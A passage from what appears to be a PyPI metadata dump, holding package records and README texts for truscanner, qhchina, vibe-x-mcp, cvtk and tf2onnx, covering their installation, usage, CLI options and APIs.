] | twine/6.2.0 CPython/3.9.13 | 2026-02-20T06:38:07.747611 | adyen_apimatic_sdk-1.0.1.tar.gz | 596,344 | 57/ce/ff8c686da26f97089e5bfdf366b89adc902c433839281fe025bd30495ce1/adyen_apimatic_sdk-1.0.1.tar.gz | source | sdist | null | false | 7e8693a53981d02671c7c6526a153335 | eff9729ac9616abea2a5a746a29e48d5df2fd2260ee78ed73216681fb6d60e31 | 57ceff8c686da26f97089e5bfdf366b89adc902c433839281fe025bd30495ce1 | null | [
"LICENSE"
] | 218 |
2.4 | truscanner | 0.2.7 | Open-Source Static Analysis for Privacy Data Flows | # truScanner from truConsent


**Open-Source Static Analysis for Privacy Data Flows**
`truScanner` is a static code analysis tool designed to discover and analyze personal data elements in your source code. It helps developers and security teams identify privacy-related data flows and generate comprehensive reports.
[📦 PyPI Project](https://pypi.org/project/truscanner/) • [🌐 App Dashboard](https://app.truconsent.io/)
## 🚀 Features
- **Comprehensive Detection**: Identifies 300+ personal data elements (PII, financial data, device identifiers, etc.)
- **Full Catalog Coverage**: Loads and scans against all configured data elements from `data_elements/` (not a truncated subset)
- **Interactive Menu**: Arrow-key navigable menu for selecting output formats
- **Real-time Progress**: Visual progress indicator during scanning
- **Multiple Report Formats**: Generate reports in TXT, Markdown, or JSON format
- **AI-Powered Enhancement**: Optional integration with Ollama or OpenAI for deeper context
- **Backend Integration**: Optional upload to backend API for centralized storage
- **Auto-incrementing Reports**: Automatically manages report file naming to prevent overwrites
## truScanner CLI

## 📦 Installation
### Prerequisites
- Python 3.9 or higher
- [Ollama](https://ollama.com/) (optional, for local AI scanning)
### Quick Install
Using pip:
```bash
pip install truscanner
```
Using uv:
```bash
uv pip install truscanner
```
### Verify installation:
```bash
truscanner --help
```
## 🛠️ Usage
### Basic Usage
Scan a directory with the interactive menu:
```bash
truscanner scan <directory_path>
```
### Example
```bash
truscanner scan ./src
truscanner scan ./my-project
truscanner scan C:\Users\username\projects\my-app
```
### Python API Usage
Use truScanner directly from Python:
```python
import truscanner
# Local path
check = truscanner("/path/to/project")
# file:// URL also works
check = truscanner("file:///Users/username/project")
# Optional explicit call style
check = truscanner.scan("/path/to/project", with_ai=False)
# API metadata: total configured catalog size
print(check["configured_data_elements"])
```
Minimal script style:
```python
import truscanner
scan = truscanner("folder_path")
```
Runnable root example:
```bash
python3 simple_truscanner_usage.py ./src
```
Quick smoke check script:
```bash
uv run python scripts/check_truscanner_api.py ./src
```
Installed-package verification (CLI + Python API):
```bash
python3 verify_truscanner_install.py
```
### Interactive Workflow
1. **Select Output Format**:
- Use arrow keys (↑↓) to navigate
- Press Enter to select
- Options: `txt`, `md`, `json`, or `All` (generates all three formats)
2. **Scanning Progress**:
- Real-time progress bar shows file count and percentage
- Prints configured definition count at start (example: `Loaded data element definitions: 380`)
- Example: `Scanning: 50/200 (25%) [████████░░░░░░░░░░░░] filename.js`
3. **AI Enhanced Scan (Optional)**:
- After the initial scan, you'll be prompted:
`Do you want to use Ollama/AI for enhanced PII detection (find what regex missed)? (Y, N):`
- This uses local LLMs (via Ollama) or OpenAI to find complex PII.
- Live scanning timer: `AI Scanning: filename.js... (5.2s taken)`
4. **Report Generation**:
- Reports are saved in `reports/{directory_name}/` folder
- Files are named: `truscan_report.txt`, `truscan_report.md`, `truscan_report.json`
- Subsequent scans auto-increment: `truscan_report1.txt`, `truscan_report2.txt`, etc.
- AI findings are saved with `_llm` suffix.
5. **Backend Upload (Optional)**:
- After reports are saved, you'll be prompted: `Do you want to upload the scan report for the above purpose? (Y, N):`
- Enter `Y` to upload scan results to backend API
- View your uploaded scans and analytics at [app.truconsent.io](https://app.truconsent.io/)
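The auto-incrementing naming described in step 4 can be sketched in plain Python. This is an illustration of the scheme only, not truscanner's actual implementation, and `next_report_name` is a hypothetical helper:

```python
import os

def next_report_name(report_dir, base="truscan_report", ext=".txt"):
    """Return base.ext if unused, otherwise base1.ext, base2.ext, ..."""
    candidate = base + ext
    n = 0
    while os.path.exists(os.path.join(report_dir, candidate)):
        n += 1
        candidate = f"{base}{n}{ext}"
    return candidate
```

With `truscan_report.txt` already present in the reports folder, the helper yields `truscan_report1.txt` next, matching the behavior above.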
### Command Options
```bash
truscanner scan <directory> [OPTIONS]
Options:
--with-ai Enable AI/LLM scanner directly
--ai-mode AI scan mode: fast, balanced, or full (default: balanced)
--personal-only Only report personally identifiable information (PII)
--help Show help message
```
### AI Speed vs Coverage Modes
Use `--ai-mode` to control AI scan behavior:
- `fast`: Small prompts, fastest runtime, may skip very large low-signal files
- `balanced` (default): Good speed while keeping broad file coverage
- `full`: Largest context and highest coverage, slowest runtime
Examples:
```bash
truscanner scan ./src --ai-mode fast
truscanner scan ./src --ai-mode balanced
truscanner scan ./src --ai-mode full
```
## 📊 Report Output
### Report Location
Reports are saved in: `reports/{sanitized_directory_name}/`
### Report Formats
- **TXT Report** (`truscan_report.txt`): Plain text format, easy to read
- **Markdown Report** (`truscan_report.md`): Formatted markdown with headers and code blocks
- **JSON Report** (`truscan_report.json`): Structured JSON data for programmatic access
### Report Contents
Each report includes:
- **Scan Report ID**: Unique 32-character hash identifier
- **Summary**: Configured data elements, distinct detected elements, total findings, and time taken
- **Findings by File**: Detailed list of data elements found in each file
- **Summary by Category**: Aggregated statistics by data category
JSON reports also include:
- `configured_data_elements`
- `distinct_detected_elements`
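As an illustrative sketch only (field names other than the two listed above are assumptions, not the documented schema), a JSON report might look like:

```json
{
  "scan_report_id": "3f2c9a1e5b7d4c8e9f0a1b2c3d4e5f60",
  "configured_data_elements": 380,
  "distinct_detected_elements": 12,
  "total_findings": 47,
  "findings": [
    { "file": "src/app.js", "data_element": "email_address", "line": 42 }
  ]
}
```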
### Report ID
Each scan generates a unique **Scan Report ID** (32-character MD5 hash) that:
- Appears in the terminal after scanning
- Is included at the top of all generated report files
- Can be used to track and reference specific scans
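For illustration, a 32-character MD5 identifier like the one described can be produced with `hashlib`. This is a hypothetical derivation (`make_report_id` is not truscanner's actual algorithm); it only shows the shape of such an ID:

```python
import hashlib
import json

def make_report_id(directory: str, timestamp: int) -> str:
    # Hash a stable JSON payload; MD5's hexdigest() is always 32 hex chars.
    payload = json.dumps({"dir": directory, "ts": timestamp}, sort_keys=True)
    return hashlib.md5(payload.encode("utf-8")).hexdigest()

print(make_report_id("./src", 1700000000))  # 32 hex characters
```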
## 🔧 Configuration
The `truscanner` package is pre-configured with the live backend URL for seamless scan uploads. No additional configuration is required.
## 📁 Project Structure
```
truscanner/
├── src/
│ ├── main.py # CLI entry point
│ ├── regex_scanner.py # Core scanning engine
│ ├── ai_scanner.py # AI/LLM scanning engine
│ ├── report_utils.py # Report utilities
│ └── utils.py # Utilities
├── data_elements/ # Data element definitions
├── reports/ # Generated reports
├── pyproject.toml # Project configuration
└── README.md
```
## 📝 Change Policy
For this repository, every code or behavior change must include a matching README update in the same change.
This includes:
- CLI flags, prompts, defaults, scan behavior, output format changes
- Python API changes (`import truscanner`, return schema, parameters)
- Dependency/runtime requirements
- Report format/location updates
## 🤝 Support
For issues, questions, or contributions, please contact: hello@truconsent.io
## 📄 License
MIT License - see LICENSE file for details
| text/markdown | null | truconsent <hello@truconsent.io> | null | null | MIT | null | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"click>=8.1.8",
"inquirer>=3.1.0",
"ollama>=0.1.0",
"openai>=1.0.0",
"python-dotenv>=1.0.0",
"requests>=2.31.0",
"build; extra == \"dev\"",
"hatchling; extra == \"dev\"",
"pytest>=8.0.0; extra == \"dev\"",
"twine; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.6 | 2026-02-20T06:37:44.959932 | truscanner-0.2.7.tar.gz | 39,272 | e8/af/20ec44acc712b1eddefb2c3f03338b93282110b7c103b5d4fa544d7d5f1b/truscanner-0.2.7.tar.gz | source | sdist | null | false | 285d9ba139f3dd8b695a6d1a76e2be4b | c5b759b014185effd2ba0fe6723726da5037592f47066ec06d99bce037ffe64b | e8af20ec44acc712b1eddefb2c3f03338b93282110b7c103b5d4fa544d7d5f1b | null | [
"LICENSE"
] | 212 |
2.4 | qhchina | 0.1.13 | A Python package for NLP tasks related to Chinese text. | # qhChina
A Python toolkit for computational analysis of Chinese texts in humanities research.
## Features
- **Preprocessing**: Chinese text segmentation with multiple backends (spaCy, Jieba, BERT, LLM)
- **Word Embeddings**: Word2Vec training and temporal semantic change analysis (TempRefWord2Vec)
- **Topic Modeling**: LDA with Gibbs sampling and Cython acceleration
- **Stylometry**: Authorship attribution and document clustering
- **Collocations**: Statistical collocation analysis and co-occurrence matrices
- **Corpus Comparison**: Identify significant vocabulary differences between corpora
- **Helpers**: CJK font management, text loading, stopwords
## Installation
```bash
pip install qhchina
```
## Building from Source
```bash
git clone https://github.com/mcjkurz/qhchina.git
cd qhchina
pip install -e .
```
This will compile the Cython extensions and install the package in editable mode.
## Documentation
Full documentation and examples: [www.qhchina.org/docs/](https://www.qhchina.org/docs/)
## Tests
```bash
pip install pytest
pytest tests/
```
## License
MIT License
| text/markdown | null | Maciej Kurzynski <makurz@gmail.com> | null | null | MIT | digital humanities, nlp, Chinese, text analysis, corpus linguistics, topic modeling, stylometry | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Cython",
"Topic :: Text Processing :: Linguistic",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Natural Language :: Chinese (Simplified)",
"Natural Language :: Chinese (Traditional)"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"numpy>=2.0.2",
"scipy>=1.14.1",
"matplotlib>=3.10.0",
"scikit-learn>=1.6.1",
"tqdm>=4.66.0",
"pandas>=2.1.0"
] | [] | [] | [] | [
"Homepage, https://www.qhchina.org/docs",
"Documentation, https://www.qhchina.org/docs",
"Repository, https://github.com/mcjkurz/qhchina",
"Bug Tracker, https://github.com/mcjkurz/qhchina/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:36:42.204034 | qhchina-0.1.13.tar.gz | 31,397,875 | d8/25/75f3a4e46d539775b17c877532d8c1c3dfc594d3c8800a00383d7e9c9bff/qhchina-0.1.13.tar.gz | source | sdist | null | false | fdd41b1f3925fcc390bf36c1c8b37254 | 46676eab966b03fe88b71d0b2be4074b071bdabdcf0927a0f71e7b53cd4693c5 | d82575f3a4e46d539775b17c877532d8c1c3dfc594d3c8800a00383d7e9c9bff | null | [
"LICENSE"
] | 1,200 |
2.4 | vibe-x-mcp | 1.0.0 | VIBE-X AI Code Quality & Team Collaboration MCP Server | # vibe-x-mcp
VIBE-X AI Code Quality & Team Collaboration MCP Server for Cursor / Claude.
## Features
- **6-Gate Pipeline**: Syntax, Rules, Integration, Security, Architecture, Collision
- **RAG Code Search**: Semantic search over your codebase via ChromaDB
- **Hidden Intent (.meta.json)**: Auto-extract code intent with AST analysis
- **Team Collaboration**: Work Zone conflict prevention, Decision Extractor
- **Alert & Feedback**: Failure pattern analysis, threshold-based alerts
- **Onboarding Q&A**: RAG-based project Q&A for new team members
## 19 MCP Tools
| Category | Tools |
|----------|-------|
| Quality | `gate_check`, `pipeline`, `security_review`, `architecture_check` |
| RAG | `code_search`, `index_codebase` |
| Collab | `work_zone`, `extract_decisions` |
| Meta | `meta_analyze`, `meta_batch`, `meta_coverage`, `meta_dependency_graph` |
| Analysis | `feedback_analysis`, `integration_test` |
| Ops | `project_status`, `onboarding_qa`, `get_alerts`, `acknowledge_alerts`, `health_breakdown` |
## Install
```bash
pip install vibe-x-mcp
```
## Usage
### Cursor IDE
Add to `~/.cursor/mcp.json`:
```json
{
"mcpServers": {
"vibe-x": {
"command": "vibe-x-mcp",
"args": ["--project-root", "/path/to/your/project"],
"env": {
"PYTHONIOENCODING": "utf-8"
}
}
}
}
```
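Claude Desktop reads the same `mcpServers` shape from its own config file (`claude_desktop_config.json`; the path is platform-dependent). The entry below simply mirrors the Cursor example and is a sketch, not verified against every Claude Desktop version:

```json
{
  "mcpServers": {
    "vibe-x": {
      "command": "vibe-x-mcp",
      "args": ["--project-root", "/path/to/your/project"],
      "env": { "PYTHONIOENCODING": "utf-8" }
    }
  }
}
```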
### CLI
```bash
vibe-x-mcp --project-root /path/to/your/project
vibe-x-mcp --project-root . --transport sse
```
### uvx (no install)
```bash
uvx vibe-x-mcp --project-root /path/to/your/project
```
## Requirements
- Python >= 3.10
- Project with source code to analyze
## License
MIT
| text/markdown | null | Team VibeJewang <choidage@gmail.com> | null | null | null | ai, code-quality, cursor, mcp, vibe-x | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Topic :: Software Development :: Quality Assurance"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"chromadb>=1.0.0",
"click>=8.1.0",
"fastapi>=0.115.0",
"mcp>=1.0.0",
"pydantic>=2.0.0",
"rich>=13.0.0",
"sentence-transformers>=3.0.0",
"uvicorn>=0.27.0"
] | [] | [] | [] | [
"Homepage, https://github.com/choidage/daker",
"Repository, https://github.com/choidage/daker"
] | twine/6.2.0 CPython/3.11.5 | 2026-02-20T06:36:25.563428 | vibe_x_mcp-1.0.0.tar.gz | 51,648 | 3a/49/a6f8ede8fbbaff7e18a8094ae305540ba9f6c6217fbc695365fb409edbea/vibe_x_mcp-1.0.0.tar.gz | source | sdist | null | false | fc5c62ca5bd57c61a34ba3f789197a4e | 4a79053d3beadc081797a503a60c84a2492ba0fb8c8f39c3a919f7ddbc2f5040 | 3a49a6f8ede8fbbaff7e18a8094ae305540ba9f6c6217fbc695365fb409edbea | MIT | [
"LICENSE"
] | 281 |
2.4 | cvtk | 0.2.18.220 | computer vision toolkit | # cvtk
The cvtk (Computer Vision Toolkit) package provides a suite of command-line tools
for common computer vision tasks,
such as image processing, object detection, and image classification.
Built on top of widely used libraries like PyTorch and MMDetection,
cvtk offers a straightforward and user-friendly interface for tackling complex tasks.
This simplicity makes it ideal for beginners in both computer vision and Python,
allowing them to quickly initiate and advance their projects in the field.
## Documentation
- https://cvtk.readthedocs.io/en/latest/index.html
## Citation
The cvtk (Computer Vision Toolkit) package was forked from
the [JustDeepIt](https://justdeepit.readthedocs.io/en/latest/index.html) package.
If you are using cvtk in your work, please cite the following reference:
Sun J, Cao W, Yamanaka T.
JustDeepIt: Software tool with graphical and character user interfaces
for deep learning-based object detection and segmentation in image analysis.
Front. Plant Sci., 2022, 13:964058.
doi: [10.3389/fpls.2022.964058](https://doi.org/10.3389/fpls.2022.964058)
| text/markdown | null | Jianqiang Sun <sun@bitdessin.dev> | null | null | MIT | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Image Recognition"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"requests",
"filetype",
"pillow",
"numpy>=1.21",
"pandas>=1.3",
"matplotlib",
"pycocotools",
"scikit-learn",
"scikit-image",
"torch; extra == \"full\"",
"torchvision; extra == \"full\"",
"openmim; extra == \"full\"",
"mmengine; extra == \"full\"",
"mmcv; extra == \"full\"",
"mmdet; extra == \"full\"",
"plotly; extra == \"full\"",
"kaleido; extra == \"full\"",
"flask; extra == \"full\"",
"gunicorn; extra == \"full\"",
"label-studio-sdk; extra == \"full\"",
"label-studio-ml; extra == \"full\"",
"label-studio-tools; extra == \"full\"",
"torch; extra == \"docs\"",
"torchvision; extra == \"docs\"",
"openmim; extra == \"docs\"",
"mmengine; extra == \"docs\"",
"mmcv-lite; extra == \"docs\"",
"mmdet; extra == \"docs\"",
"plotly; extra == \"docs\"",
"kaleido; extra == \"docs\"",
"flask; extra == \"docs\"",
"gunicorn; extra == \"docs\"",
"label-studio-sdk; extra == \"docs\"",
"label-studio-ml; extra == \"docs\"",
"label-studio-tools; extra == \"docs\"",
"sphinx; extra == \"docs\"",
"sphinx-rtd-theme; extra == \"docs\"",
"sphinxcontrib-napoleon; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/bitdessin/cvtk",
"Issues, https://github.com/bitdessin/cvtk/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:35:43.841630 | cvtk-0.2.18.220.tar.gz | 54,435 | 59/57/f94ca8cc2c98ade353a3c3f7103f85420ddb4effca1d98d20652c66f9b93/cvtk-0.2.18.220.tar.gz | source | sdist | null | false | a3cadadc98c25d6e491de93fccbb11dd | 440d11f7fa881b03663ae256a6153548d4156faaab40d6a44dd9f1e217ec955c | 5957f94ca8cc2c98ade353a3c3f7103f85420ddb4effca1d98d20652c66f9b93 | null | [] | 225 |
2.4 | tf2onnx | 1.17.0rc1 | Tensorflow to ONNX converter | <!--
Copyright (c) ONNX Project Contributors
SPDX-License-Identifier: Apache-2.0
-->
# tf2onnx - Convert TensorFlow, Keras, Tensorflow.js and Tflite models to ONNX.
tf2onnx converts TensorFlow (tf-2.x), keras, tensorflow.js and tflite models to ONNX via command
line or python api.
## 🛠 Maintainer Wanted
We are currently **looking for a new maintainer** to help support and evolve the `tf2onnx` project.
If you're passionate about the ONNX standard or contributing to the open source machine learning ecosystem, we'd love to hear from you! This is a great opportunity to contribute to a widely used project and collaborate with the ONNX community.
**To express interest:**
Please open an issue or comment on [this thread](https://github.com/onnx/tensorflow-onnx/issues) and let us know about your interest and background.
__Note: tensorflow.js support was just added. While we tested it with many tfjs models from tfhub, it should be considered experimental.__
TensorFlow has many more ops than ONNX, and occasionally mapping a model to ONNX creates issues.
You can find a list of supported TensorFlow ops and their mapping to ONNX [here](support_status.md).
The common issues we run into are documented in the [Troubleshooting Guide](Troubleshooting.md).
<br/>
| Build Type | OS | Python | TensorFlow | ONNX opset |
| --- | - | --- | --- | --- |
| Unit Test - Basic | Linux, Windows | 3.10-3.12 | 2.13-2.15 | 14-18 |
| Unit Test - Full | Linux, Windows | 3.10-3.12 | 2.13-2.15 | 14-18 |
<br/>
## Supported Versions
### ONNX
tf2onnx will use the ONNX version installed on your system, and will install the latest ONNX version if none is found.
We support and test ONNX opset-14 to opset-18. opset-6 to opset-13 should work but we don't test them.
By default we use ```opset-15``` for the resulting ONNX graph.
If you want the graph to be generated with a specific opset, use ```--opset``` in the command line, for example ```--opset 15```.
### TensorFlow
We support ```tf-2.x```. To keep our test matrix manageable we test tf2onnx running on top of ```tf-2.13 or better```.
### Python
We support Python ```3.10-3.12```.
## Prerequisites
### Install TensorFlow
If you don't have TensorFlow installed already, install the desired TensorFlow build, for example:
```pip install tensorflow```
### (Optional) Install runtime
If you want to run tests, install a runtime that can run ONNX models. For example:
ONNX Runtime (available for Linux, Windows, and Mac):
```pip install onnxruntime```
## Installation
### Install from pypi
```pip install -U tf2onnx```
### Install latest from github
```pip install git+https://github.com/onnx/tensorflow-onnx```
### Build and install latest from source (for development)
```git clone https://github.com/onnx/tensorflow-onnx```
Once dependencies are installed, from the tensorflow-onnx folder call:
```python setup.py install```
or
```python setup.py develop```
tensorflow-onnx requires onnx-1.9 or better and will install/upgrade onnx if needed.
To create a wheel for distribution:
```python setup.py bdist_wheel```
## Getting started
To get started with `tensorflow-onnx`, run the `tf2onnx.convert` command, providing:
* the path to your TensorFlow model (where the model is in `saved model` format)
* a name for the ONNX output file:
```python -m tf2onnx.convert --saved-model tensorflow-model-path --output model.onnx```
The above command uses a default of `15` for the ONNX opset. If you need a newer opset, or want to limit your model to use an older opset then you can provide the `--opset` argument to the command. If you are unsure about which opset to use, refer to the [ONNX operator documentation](https://github.com/onnx/onnx/releases).
```python -m tf2onnx.convert --saved-model tensorflow-model-path --opset 18 --output model.onnx```
If your TensorFlow model is in a format other than `saved model`, then you need to provide the inputs and outputs of the model graph.
For `checkpoint` format:
```python -m tf2onnx.convert --checkpoint tensorflow-model-meta-file-path --output model.onnx --inputs input0:0,input1:0 --outputs output0:0```
For `graphdef` format:
```python -m tf2onnx.convert --graphdef tensorflow-model-graphdef-file --output model.onnx --inputs input0:0,input1:0 --outputs output0:0```
If your model is in `checkpoint` or `graphdef` format and you do not know the input and output nodes of the model, you can use the [summarize_graph](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/tools/graph_transforms) TensorFlow utility. The `summarize_graph` tool does need to be downloaded and built from source. If you have the option of going to your model provider and obtaining the model in `saved model` format, then we recommend doing so.
You can find an end-to-end tutorial for ssd-mobilenet [here](tutorials/ConvertingSSDMobilenetToONNX.ipynb).
We recently added support for tflite. You can convert ```tflite``` models via the command line, for example:
```python -m tf2onnx.convert --opset 16 --tflite tflite-file --output model.onnx```
## CLI reference
```
python -m tf2onnx.convert
--saved-model SOURCE_SAVED_MODEL_PATH |
--checkpoint SOURCE_CHECKPOINT_METAFILE_PATH |
--tflite TFLITE_MODEL_PATH |
--tfjs TFJS_MODEL_PATH |
--input | --graphdef SOURCE_GRAPHDEF_PB
--output TARGET_ONNX_MODEL
[--inputs GRAPH_INPUTS]
[--outputs GRAPH_OUTPUTS]
[--inputs-as-nchw inputs_provided_as_nchw]
[--outputs-as-nchw outputs_provided_as_nchw]
[--opset OPSET]
[--dequantize]
[--tag TAG]
[--signature_def SIGNATURE_DEF]
[--concrete_function CONCRETE_FUNCTION]
[--target TARGET]
[--extra_opset list-of-extra-opset]
[--custom-ops list-of-custom-ops]
[--load_op_libraries tensorflow_library_path]
[--large_model]
[--continue_on_error]
[--verbose]
[--output_frozen_graph]
```
### Parameters
#### --saved-model
TensorFlow model as saved_model. We expect the path to the saved_model directory.
#### --checkpoint
TensorFlow model as checkpoint. We expect the path to the .meta file.
#### --input or --graphdef
TensorFlow model as graphdef file.
#### --tfjs
Convert a tensorflow.js model by providing a path to the .tfjs file. Inputs/outputs do not need to be specified.
#### --tflite
Convert a tflite model by providing a path to the .tflite file. Inputs/outputs do not need to be specified.
#### --output
The target onnx file path.
#### --inputs, --outputs
TensorFlow model's input/output names, which can be found with [summarize graph tool](#summarize_graph). Those names typically end with ```:0```, for example ```--inputs input0:0,input1:0```. Inputs and outputs are ***not*** needed for models in saved-model format. Some models specify placeholders with unknown ranks and dims which can not be mapped to onnx. In those cases one can add the shape after the input name inside `[]`, for example `--inputs X:0[1,28,28,3]`. Use -1 to indicate unknown dimensions.
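The bracketed shape-override syntax above can be parsed mechanically. The helper below is a hypothetical illustration of the format (`parse_input_spec` is not part of tf2onnx):

```python
import re

def parse_input_spec(spec):
    """Parse a --inputs value like "input0:0,input1:0[1,-1,28,3]".

    Returns {tensor_name: shape_list_or_None}; -1 marks an unknown dim.
    """
    result = {}
    # A name is anything up to a comma or '[', optionally followed by a
    # bracketed, comma-separated list of (possibly negative) integers.
    for m in re.finditer(r"([^\[,]+)(?:\[([-\d,]+)\])?", spec):
        shape = m.group(2)
        result[m.group(1)] = [int(d) for d in shape.split(",")] if shape else None
    return result

print(parse_input_spec("X:0[1,28,28,3]"))  # {'X:0': [1, 28, 28, 3]}
```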
#### --inputs-as-nchw
By default we preserve the image format of inputs (`nchw` or `nhwc`) as given in the TensorFlow model. If your host's native format is nchw (for example Windows) but the model is written for nhwc, pass ```--inputs-as-nchw``` and tensorflow-onnx will transpose the input. Doing so is convenient for the application, and in many cases the converter can optimize the transpose away. For example ```--inputs input0:0,input1:0 --inputs-as-nchw input0:0``` assumes that images are passed into ```input0:0``` as nchw while the given TensorFlow model uses nhwc.
#### --outputs-as-nchw
Similar usage to `--inputs-as-nchw`. By default we preserve the format of outputs (`nchw` or `nhwc`) as given in the TensorFlow model. If your host's native format is nchw but the model is written for nhwc, pass ```--outputs-as-nchw``` and tensorflow-onnx will transpose the output and optimize the transpose away where possible. For example ```--outputs output0:0,output1:0 --outputs-as-nchw output0:0``` treats ```output0:0``` as nchw while the given TensorFlow model uses nhwc.
#### --ignore_default, --use_default
ONNX requires default values for graph inputs to be constant, while Tensorflow's PlaceholderWithDefault op accepts computed defaults. To convert such models, pass a comma-separated list of node names to the ignore_default and/or use_default flags. PlaceholderWithDefault nodes with matching names will be replaced with Placeholder or Identity ops, respectively.
#### --opset
By default we use the opset 15 to generate the graph. By specifying ```--opset``` the user can override the default to generate a graph with the desired opset. For example ```--opset 17``` would create a onnx graph that uses only ops available in opset 17. Because older opsets have in most cases fewer ops, some models might not convert on an older opset.
#### --dequantize
(This is experimental, only supported for tflite)
Produces a float32 model from a quantized tflite model. Detects ReLU and ReLU6 ops from quantization bounds.
#### --tag
Only valid with parameter `--saved-model`. Specifies the tag in the saved_model to be used. Typical value is 'serve'.
#### --signature_def
Only valid with parameter `--saved-model`. Specifies which signature to use within the specified --tag value. Typical value is 'serving_default'.
#### --concrete_function
(This is experimental, valid only for TF2.x models)
Only valid with parameter `--saved-model`. If a model contains a list of concrete functions, under the function name `__call__` (as can be viewed using the command `saved_model_cli show --all`), this parameter is a 0-based integer specifying which function in that list should be converted. This parameter takes priority over `--signature_def`, which will be ignored.
#### --target
Some models require special handling to run on some runtimes. In particular, the model may use unsupported data types. Workarounds are activated with ```--target TARGET```. Currently supported values are listed on this [wiki](https://github.com/onnx/tensorflow-onnx/wiki/target). If your model will be run on Windows ML, you should specify the appropriate target value.
#### --extra_opset
If you want to convert a TF model using an existing custom op, this can specify the corresponding domain and version.
The format is a comma-separated map of domain and version, for example: `ai.onnx.contrib:1`.
#### --custom-ops
If a model contains ops not recognized by onnx runtime, you can tag these ops with a custom op domain so that the
runtime can still open the model. The format is a comma-separated map of tf op names to domains in the format
OpName:domain. If only an op name is provided (no colon), the default domain of `ai.onnx.converters.tensorflow`
will be used.
#### --load_op_libraries
Load the comma-separated list of tensorflow plugin/op libraries before conversion.
#### --large_model
(Can be used only for TF2.x models)
Only valid with parameter `--saved-model`. When set, creates a zip file containing the ONNX protobuf model and large tensor values stored externally. This allows for converting models whose size exceeds the 2 GB protobuf limit.
#### --continue_on_error
Continue to run conversion on error, ignore graph cycles so it can report all missing ops and errors.
#### --verbose
Verbose detailed output for diagnostic purposes.
#### --output_frozen_graph
Save the frozen and optimized tensorflow graph to a file for debug.
### <a name="summarize_graph"></a>Tool to get Graph Inputs & Outputs
The model developer will usually know the graph's inputs and outputs; otherwise, you can consult TensorFlow's [summarize_graph](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/tools/graph_transforms) tool, for example:
```
summarize_graph --in_graph=tests/models/fc-layers/frozen.pb
```
## Testing
There are 2 types of tests.
### Unit test
```
python setup.py test
```
### Validate pre-trained TensorFlow models
```
python tests/run_pretrained_models.py
usage: run_pretrained_models.py [-h] [--cache CACHE] [--tests TESTS] [--backend BACKEND] [--verbose] [--debug] [--config yaml-config]
optional arguments:
  -h, --help            show this help message and exit
  --cache CACHE         pre-trained models cache dir
  --tests TESTS         tests to run
  --backend BACKEND     backend to use
  --config yaml-config  yaml config file
  --verbose             verbose output, option is additive
  --opset OPSET         target opset to use
  --perf csv-file       capture performance numbers for tensorflow and onnx runtime
  --debug               dump generated graph with shape info
```
```run_pretrained_models.py``` runs the TensorFlow model, captures the TensorFlow output, converts the model, and then runs the same test against the specified ONNX backend.
If the option ```--perf csv-file``` is specified, inference timings for TensorFlow and ONNX Runtime are captured and written to the given csv file.
For example:
```
python tests/run_pretrained_models.py --backend onnxruntime --config tests/run_pretrained_models.yaml --perf perf.csv
```
#### <a name="save_pretrained_model"></a>Tool to save pre-trained model
We provide a [utility](tools/save_pretrained_model.py) to save a pre-trained model along with its config.
Put `save_pretrained_model(sess, outputs, feed_inputs, save_dir, model_name)` in your last testing epoch and the pre-trained model and config will be saved under `save_dir/to_onnx`.
Please refer to the example in [tools/save_pretrained_model.py](tools/save_pretrained_model.py) for more information.
Note the minimum required Tensorflow version is r1.6.
## Python API Reference
With tf2onnx-1.8.4 we updated our API. The old API still works; you can find its documentation [here](https://github.com/onnx/tensorflow-onnx/blob/v1.8.3/README.md#python-api-reference).
### from_keras (tf-2.0 and newer)
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_keras(model,
    input_signature=None, opset=None, custom_ops=None,
    custom_op_handlers=None, custom_rewriter=None,
    inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
    shape_override=None, target=None, large_model=False, output_path=None)

Args:
    model: the tf.keras model we want to convert
    input_signature: a tf.TensorSpec or a numpy array defining the shape/dtype of the input
    opset: the opset to be used for the ONNX model, default is the latest
    custom_ops: if a model contains ops not recognized by onnx runtime,
        you can tag these ops with a custom op domain so that the
        runtime can still open the model. Type is a dictionary `{op name: domain}`.
    target: list of workarounds applied to help certain platforms
    custom_op_handlers: dictionary of custom op handlers
    custom_rewriter: list of custom graph rewriters
    extra_opset: list of extra opsets, for example the opsets used by custom ops
    shape_override: dict with inputs that override the shapes given by tensorflow
    inputs_as_nchw: transpose inputs in list from nhwc to nchw
    outputs_as_nchw: transpose outputs in list from nhwc to nchw
    large_model: use the ONNX external tensor storage format
    output_path: save model to output_path

Returns:
    An ONNX model_proto and an external_tensor_storage dict.
```
See [tutorials/keras-resnet50.ipynb](tutorials/keras-resnet50.ipynb) for an end-to-end example.
### from_function (tf-2.0 and newer)
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_function(function,
    input_signature=None, opset=None, custom_ops=None,
    custom_op_handlers=None, custom_rewriter=None, inputs_as_nchw=None,
    outputs_as_nchw=None, extra_opset=None, shape_override=None,
    target=None, large_model=False, output_path=None)

Args:
    function: the tf.function we want to convert
    input_signature: a tf.TensorSpec or a numpy array defining the shape/dtype of the input
    opset: the opset to be used for the ONNX model, default is the latest
    custom_ops: if a model contains ops not recognized by onnx runtime,
        you can tag these ops with a custom op domain so that the
